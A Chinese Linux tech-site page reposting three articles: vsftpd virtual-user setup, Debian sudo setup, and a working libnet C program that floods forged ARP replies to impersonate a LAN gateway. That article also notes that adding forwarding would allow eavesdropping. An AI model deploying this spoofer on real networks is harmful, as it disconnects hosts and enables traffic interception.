当前位置:  操作系统/服务器>linux
本页文章导读:
    ▪vsftp建立虚拟用户不同目录分配不同权限操作步骤详解       vsftpd服务器同时支持匿名用户、本地用户和虚拟用户三类用户账号,使用虚拟用户账号可以提供集中管理的FTP根目录,方便了管理员的管理,同时将用于FTP登录的用户名、密码与系统用户账.........
    ▪Linux使用libnet实现ARP攻击脚本原理分析以防被攻击       闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP.........
    ▪debian安装后sudo命令不能用的解决方法       debian安装完之后发现sudo命令不能用 找了半天发现是没有安装sudo 得了,进入root安包,炸开他,apt-get install sudo 安装完发现又出现一堆怪问题 不管他,继续前进 在root设置sudoers配制文件 代.........

[1]vsftp建立虚拟用户不同目录分配不同权限操作步骤详解
    来源: 互联网  发布时间: 2013-12-24

vsftpd服务器同时支持匿名用户、本地用户和虚拟用户三类用户账号,使用虚拟用户账号可以提供集中管理的FTP根目录,方便了管理员的管理,同时将用于FTP登录的用户名、密码与系统用户账号区别开,进一步增强了FTP服务器的安全性。

1、在/etc/vsftpd/vsftpd.conf加入或者更改以下配置语句:

代码如下:

anonymous_enable=NO (当然你也可以设成YES,同时允许匿名用户登陆)
local_enable=YES (必须置YES,因为虚拟用户是映射到virtual这个本地用户来访问的)
guest_enable=YES(启用虚拟用户)
guest_username=virtual(第5步中创建,将虚拟用户映射为本地virtual用户)
pam_service_name=vsftpd.vu(第2步中创建,指定PAM配置文件,文件已经在/etc/pam.d/存在)
user_config_dir=/etc/vsftpd/user_conf(第7,8步中创建,指定不同虚拟用户配置文件的存放路径)

2、在/etc/pam.d/中修改文件vsftpd.vu, 对比修改内容:

代码如下:

auth required pam_userdb.so db=/etc/vsftpd/vsftpd_login    
account required pam_userdb.so db=/etc/vsftpd/vsftpd_login

(/etc/vsftpd/vsftpd_login 在第3,4步中创建,用户账号密码数据库文件)

3、建立用户列表/tmp/logins.txt 内容如下

代码如下:

web (帐号)
****** (用户密码)
download (帐号)
******* (用户密码)
admin (帐号)
******* (用户密码)

注意:不要有空行,一行账号 一行密码;奇数行为帐号,偶数行为密码

4、建立访问者数据文件(如果没有可以安装:yum install db4-utils)
#db_load -T -t hash -f /tmp/logins.txt /etc/vsftpd/vsftpd_login.db

5、建立本地虚拟用户:

代码如下:

#useradd -d /home/ftp -s /sbin/nologin virtual

6、在/home/ftp/创建目录并改变其属性和它的宿主

代码如下:

#chown virtual /home/ftp
#chmod 700 /home/ftp

7、创建ftp用户配制文件目录:/etc/vsftpd/user_conf

代码如下:

#mkdir /etc/vsftpd/user_conf

8、在/etc/vsftpd/user_conf目录中创建以用户名命名的配置文件web、download、admin

“download”文件内容如下:

代码如下:

local_root=/home/ftp (当然,你高兴也可以设置成其它,但要注意virtual用户对此目录的权限)
anon_world_readable_only=NO (使download用户的能下载,也只能下载;写成YES,将不能列出文件和目录)

“admin”文件内容如下:

代码如下:

local_root=/home/ftp
anon_world_readable_only=NO
write_enable=YES (写权限)
anon_mkdir_write_enable=YES (新建目录权限)
anon_upload_enable=YES(上传权限)
anon_other_write_enable=YES(删除/重命名的权限)

“web”文件内容如下:

代码如下:

local_root=/var/www
anon_world_readable_only=NO
anon_umask=022 (由于web页面的特殊性,故单独设置上传文件权限为755,此掩码值可根据具体情况更改)
write_enable=YES (写权限)
anon_mkdir_write_enable=YES (新建目录权限)
anon_upload_enable=YES(上传权限)
anon_other_write_enable=YES(删除/重命名的权限)

9、最后,重新启动VSFTPD

代码如下:

#/etc/init.d/vsftpd restart

    
[2]Linux使用libnet实现ARP攻击脚本原理分析以防被攻击
    来源: 互联网  发布时间: 2013-12-24

闲来无事,用libnet写了个简单的ARP攻击。以前感觉ARP攻击不是特别常见,不过最近工作中倒是遇到过两次ARP欺骗的事件。其实ARP欺骗的原理灰常简单滴,大部分都是在局域网中发送伪造的ARP广播包, 广播包的目的是干嘛呢?很简单,欺骗内网的所有主机,告诉受害主机,“我”是网关。 内网机器接收到这种广播包之后,会刷新自己ARP缓存表,把网关的IP和广播包中的源MAC绑定。这样攻击机器就达到了冒充网关的目的。
上次一所大学就是被ARP欺骗攻击,他们的学校主页一打开就会跳出其他很多乱七八糟的页面,,,,当时查看他们WEB服务器的源代码,发现没有被插入这些<iframe>会弹页面的代码,但是用浏览器外网访问的时候,这些代码就出现了,很明显网站的返回的客户端数据在途中被劫持修改了(插入了一些代码)。

下面实现的就比较简单了,只做欺骗,不做转发,导致的后果就是局域网所有主机会断网。测试了一下,内网主机会无法上网,安了360ARP防护的会报警,能上网,就是网速有点慢,但是识别出了的攻击主机好像不准确,试了几次都识别成正常的电脑在攻击,不知道360这个识别是不是通过源MAC地址识别还是怎么识别。

代码如下:

#include "arp.h"

int main(int argc,char **argv){
 libnet_t *l;
 int i,packet_size;  //发送的数据包的长度
 libnet_ptag_t arp_tag,ether_tag;
 char *device="eth0";
 char err_buf[LIBNET_ERRBUF_SIZE];
 char *destion_ip_str = "255.255.255.255";
 char *source_ip_str = "192.168.1.1";
 u_char source_hardware[6]={0x00,0x0c,0x29,0x68,0x95,0x84};
 u_char destion_hardware[6]={0xff,0xff,0xff,0xff,0xff,0xff};
 u_int32_t source_ip,destion_ip;
 //将字符形式ip转换为网络字节序
 source_ip = libnet_name2addr4(l,source_ip_str,LIBNET_RESOLVE);
 destion_ip = libnet_name2addr4(l,destion_ip_str,LIBNET_RESOLVE);
 //初始化libnet句柄
 l = libnet_init(LIBNET_LINK,device,err_buf);
 if(l == NULL){
  printf("初始化libnet句柄失败:%s\n",err_buf);
  exit(-1);
 }
 arp_tag = libnet_build_arp(
  ARPHRD_ETHER,  //硬件地址类型,此处为以太网类型
  ETHERTYPE_IP,  //协议地址类型
  6,
  4,
  ARPOP_REPLY,  //ARP应答
  source_hardware,
  (u_int8_t *)&source_ip,
  destion_hardware,
  (u_int8_t *)&destion_ip,
  NULL,  //无负载
  0,   //负载长度为0
  l,
  0  //协议块标记,为0,表示新建协议块
  );
 ether_tag = libnet_build_ethernet(
  (u_int8_t *)&destion_hardware,
  (u_int8_t *)&source_hardware,
  ETHERTYPE_ARP,
  NULL,
  0,
  l,
  0
  );
 i = 0;
 while(1){
  packet_size = libnet_write(l);  //发送构造的ARP数据包
  usleep(10);
  i++;
 }
 printf("数据包长度为:%d\n",packet_size);
 libnet_destroy(l);
 return 0;
}

目标MAC为广播地址,全0xff就行,源MAC地址可以为本机MAC或者随便伪造的MAC(在程序中获取本机MAC可用ioctl函数,最近在写DDOS攻击程序就是用ioctl获取本机MAC和IP的),注意ARP包类型为ARPOP_REPLY(应答包)。
如果不想弄断网,只进行欺骗的话,数据发送过来之后,要进行转发到正确的网关,这样就保证内网网络正常,而且所有数据都被监听了


    
[3]debian安装后sudo命令不能用的解决方法
    来源: 互联网  发布时间: 2013-12-24

debian安装完之后发现sudo命令不能用

找了半天发现是没有安装sudo

得了,进入root安包,炸开他,apt-get install sudo

安装完发现又出现一堆怪问题

不管他,继续前进

在root设置sudoers配制文件

代码如下:

chmod +w /etc/sudoers

vim /etc/sudoers

添加一行 

代码如下:

username     ALL=(ALL) ALL

其中username是你的用户名,保存

更改sudoers文件权限

代码如下:

chmod 0440 /etc/sudoers

退出root

ok可以了,试试?;-)


    
最新技术文章:
▪Linux下实现SSH免密码登录和实现秘钥的管理、... iis7站长之家
▪a10 config backup for aXAPI
▪一键备份gitolite服务器的Shell脚本
▪nagios 分发文件实现代码
▪阿里云云服务器Linux系统更新yum源Shell脚本
▪一个监控LINUX目录和文件变化的Shell脚本分享
▪Linux下实现SSH免密码登录和实现秘钥的管理、...
▪Shell正则表达式之grep、sed、awk实操笔记
▪3个备份系统文件并邮件发送的Shell脚本分享
▪CentOS 6.3下给PHP添加mssql扩展模块教程
▪监控网站是否可以正常打开的Shell脚本分享
▪shell脚本编程之if语句学习笔记
▪shell脚本编程之循环语句学习笔记
▪shell脚本编程之case语句学习笔记
▪Shell脚本实现的阳历转农历代码分享
▪Shell脚本实现复制文件到多台服务器的代码分...
▪Shell脚本实现批量下载网络图片代码分享
▪Shell脚本实现检测文件是否被修改过代码分享
▪Shell脚本数组用法小结
▪Shell脚本批量重命名文件后缀的3种实现
▪C语言实现的ls命令源码分享
▪Linux下查找后门程序 CentOS 查后门程序的shell脚...
▪Shell 函数参数
▪linux shell 自定义函数方法(定义、返回值、变...
▪Shell实现判断进程是否存在并重新启动脚本分...
▪Shell脚本break和continue命令简明教程
▪Shell脚本函数定义和函数参数
▪让代码整洁、过程清晰的BASH Shell编程技巧
▪shell常用重定向实例讲解
▪awk中RS、ORS、FS、OFS的区别和联系小结
 


站内导航:


特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

©2012-2021,,E-mail:www_#163.com(请将#改为@)

浙ICP备11055608号-3